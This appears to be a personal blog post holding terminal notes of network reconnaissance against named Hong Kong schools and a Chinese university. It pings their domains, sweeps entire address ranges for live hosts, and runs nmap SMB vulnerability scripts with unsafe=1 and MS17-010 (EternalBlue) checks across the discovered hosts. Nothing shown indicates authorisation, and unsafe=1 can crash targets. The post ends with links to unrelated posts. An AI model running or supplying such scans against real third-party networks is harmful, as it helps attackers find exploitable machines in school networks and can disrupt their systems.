ping ccchwc.edu.hk

ping ccchwc.edu.hk
PING ccchwc.edu.hk (101.78.175.226) 56(84) bytes of data.
64 bytes from 101.78.175.226 (101.78.175.226): icmp_seq=1 ttl=56 time=6.13 ms


101.78.175.1/24

nmap --script smb-os-discovery -p 445 101.78.175.1/24


nmap -v -p139,445 --script=smb-vuln-*.nse --script-args=unsafe=1 101.78.175.254 -Pn

from ...175 : Nmap done: 256 IP addresses (79 hosts up) scanned in 117.74 seconds

===================================================================
ping ssgss.edu.hk
PING ssgss.edu.hk (103.11.100.8) 56(84) bytes of data.
64 bytes from 103-11-100-8.scicube.com (103.11.100.8): icmp_seq=1 ttl=58 time=5.20 ms

nmap -sL 103.11.100.*
nmap -n -sn 103.11.100.* -oG - | awk '/Up$/{print $2}' 1>>out_103_11_100.txt &

nmap -sP -iL out_103_11_100.txt
nmap -v -p139,445 --script=smb-vuln-*.nse --script-args=unsafe=1 -iL  out_103_11_100.txt -Pn

nmap -v -p445 --script smb-vuln-ms17-010 -iL out_103_11_100.txt

======================================================================
ping www.gzu.edu.cn
PING www.gzu.edu.cn (210.40.12.58) 56(84) bytes of data.
64 bytes from 210.40.12.58 (210.40.12.58): icmp_seq=1 ttl=47 time=244 ms

nmap -n -sn 210.40.*.* -oG - | awk '/Up$/{print $2}' 1>>out_gzu_edu_cn.txt &
nmap -v -p139,445 --script=smb-vuln-*.nse --script-args=unsafe=1 -iL out_gzu_edu_cn.txt -Pn >>cn_v0.txt &
nmap -v -p445 --script smb-vuln-ms17-010 -iL out_gzu_edu_cn.txt >> cn_ms17.txt &

=====================================================================
ping www.tkogps.edu.hk
PING www.tkogps.edu.hk (103.38.161.69) 56(84) bytes of data.
64 bytes from 103.38.161.69 (103.38.161.69): icmp_seq=1 ttl=54 time=6.63 ms

nmap -n -sn 103.38.*.* -oG - | awk '/Up$/{print $2}' 1>>out_tkogps_edu_hk.txt &
nmap -v -p139,445 --script=smb-vuln-*.nse --script-args=unsafe=1 -iL out_tkogps_edu_hk.txt -Pn >>tko_v0.txt &
nmap -v -p445 --script smb-vuln-ms17-010 -iL out_tkogps_edu_hk.txt >> tko_ms17.txt &
























留言

此網誌的熱門文章

GIMP磨皮小试-圖層,高斯模糊

Gamma校正

Tmux 用法